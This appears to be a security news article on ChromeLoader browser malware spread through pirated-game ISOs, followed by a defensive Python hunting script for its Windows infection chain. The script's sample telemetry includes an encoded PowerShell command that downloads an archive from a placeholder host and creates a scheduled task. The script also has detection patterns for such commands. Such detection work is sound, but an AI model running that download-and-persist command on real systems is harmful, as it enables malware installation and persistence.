ChromeLoader browser malware spreads via pirated games and QR codes

A new malvertising campaign has emerged in which ChromeLoader malware is used to hijack browsers and steal data.
Aedan Russell of Red Canary reports a sudden and unexpected spike in browser hijacking campaigns that use the ChromeLoader malware. Russell describes ChromeLoader as “ubiquitous and persistent”: it modifies browser settings and redirects victims to advertising sites.
The campaign is financially motivated. The operators are part of a larger affiliate marketing network and earn revenue by redirecting users to advertising sites.
What is ChromeLoader?
ChromeLoader is a malicious Chrome browser extension. It is distributed as ISO files through pay-per-install websites and scam social media posts that typically advertise pirated movies or video games, often with a QR code that leads to the download.
ChromeLoader modifies browser settings so that search results steer users into downloading unwanted software, visiting dating sites or adult gaming platforms, and taking part in fake surveys. What sets it apart from other browser hijackers is its persistence, its volume, and an infection route that abuses PowerShell.
Attack scenario
According to Red Canary’s blog post, the operators deliver the malware as a malicious ISO disk image. The image is presented as a cracked executable for commercial software or a video game, and victims download it from malicious sites or torrents; the operators also promote it through Twitter posts.
When a user double-clicks the file on Windows 10 or later, Windows mounts it as a virtual CD-ROM drive. The image contains an executable, CS_Installer.exe, that poses as a game crack or keygen but actually launches the malware.
CS_Installer.exe then decodes and executes a PowerShell command that retrieves an archive from a remote server and loads its contents into Chrome as an extension. The same PowerShell script registers a scheduled task for persistence, so the injected extension keeps hijacking and manipulating the browser’s search results.
Red Canary researchers also found that ChromeLoader operators target macOS to manipulate the Safari and Chrome browsers. The infection chain is similar on macOS, but the attackers ship a DMG (Apple Disk Image) instead of an ISO.
Instead of an executable installer, the macOS variant uses a bash installer script that downloads and unpacks the malicious extension into the /private/var/tmp directory.
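To make the Windows chain above concrete for detection, here is an added example, written for this page rather than taken from Red Canary or from the malware itself. It hunts a handful of constructed process-creation events for the behaviours the chain describes: PowerShell launched with an encoded command that fetches and unpacks a remote archive and registers a scheduled task, and Chrome launched with a side-loaded unpacked extension. Three things are assumptions, not facts from the page: that the PowerShell command is passed via the `-EncodedCommand` switch, that Chrome's `--load-extension` flag is the side-loading mechanism, and that PowerShell relaunches Chrome itself. The event records, the E: drive letter, paths, task name and URL are all constructed.

```python
"""Hunt constructed process-creation events for a ChromeLoader-style chain:
dropper on a mounted ISO -> encoded PowerShell that downloads an archive and
creates a scheduled task -> Chrome started with a side-loaded extension."""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str   # parent process image path
    image: str    # process image path
    cmdline: str  # full command line


# -EncodedCommand and the abbreviations PowerShell accepts (longest first).
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer", re.I)
UNPACK_RE = re.compile(r"expand-archive|zipfile", re.I)
SCHTASK_RE = re.compile(r"schtasks(?:\.exe)?\s+/create|register-scheduledtask|new-scheduledtask", re.I)
LOAD_EXT_RE = re.compile(r"--load-extension=", re.I)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def decode_encoded_powershell(cmdline: str):
    """Return the decoded script when the command line carries -EncodedCommand,
    else None. PowerShell encodes the script as base64 over UTF-16LE text."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev: ProcEvent) -> list[str]:
    """Return the ChromeLoader-style behaviours a single event exhibits."""
    findings = []
    image = _basename(ev.image)
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_powershell(ev.cmdline)
        # Inspect the decoded script when there is one, else the raw command line.
        script = decoded if decoded is not None else ev.cmdline
        if decoded is not None:
            findings.append("encoded_powershell")
        if DOWNLOAD_RE.search(script) and UNPACK_RE.search(script):
            findings.append("remote_archive_fetch")
        if SCHTASK_RE.search(script):
            findings.append("scheduled_task_persistence")
    if image == "chrome.exe" and LOAD_EXT_RE.search(ev.cmdline):
        findings.append("chrome_load_extension")
        # Assumption: the PowerShell stage relaunches Chrome to load the extension.
        if _basename(ev.parent) in ("powershell.exe", "pwsh.exe"):
            findings.append("chrome_spawned_by_powershell")
    return findings


def hunt(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> findings for every event with at least one finding."""
    return {i: f for i, ev in enumerate(events) if (f := classify(ev))}


# Constructed sample telemetry. The encoded script is built here so the base64
# is exact; every path, task name and URL is invented for the example.
_SCRIPT = (
    '$z="$env:APPDATA\\cs.zip";'
    "Invoke-WebRequest -Uri http://c2.example.invalid/ext.zip -OutFile $z;"
    'Expand-Archive $z "$env:APPDATA\\cs";'
    "schtasks /create /tn ChromeUpdater /sc minute /mo 30 /tr powershell.exe"
)
_ENCODED = base64.b64encode(_SCRIPT.encode("utf-16-le")).decode("ascii")
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"

SAMPLE_EVENTS = [
    # dropper run from the mounted ISO (E: assumed as the virtual CD-ROM drive)
    ProcEvent(r"C:\Windows\explorer.exe", r"E:\CS_Installer.exe", r"E:\CS_Installer.exe"),
    # dropper spawns PowerShell with the encoded download/persistence script
    ProcEvent(r"E:\CS_Installer.exe", _PS, f"powershell.exe -nop -w hidden -EncodedCommand {_ENCODED}"),
    # PowerShell relaunches Chrome with the unpacked extension side-loaded
    ProcEvent(_PS, _CHROME, r'"chrome.exe" --load-extension="C:\Users\u\AppData\Roaming\cs" --no-first-run'),
    # benign noise: a normal Chrome start and an interactive PowerShell command
    ProcEvent(r"C:\Windows\explorer.exe", _CHROME, r'"chrome.exe" https://example.com'),
    ProcEvent(r"C:\Windows\explorer.exe", _PS, "powershell.exe Get-ChildItem C:\\"),
]

if __name__ == "__main__":
    for idx, found in hunt(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].image, found)
```

In practice the same records come from Sysmon event ID 1 or EDR process telemetry; the two noisy events are there to show that a plain Chrome start and an unencoded PowerShell command produce no finding. The macOS variant (a bash script unpacking into /private/var/tmp) is not modelled here.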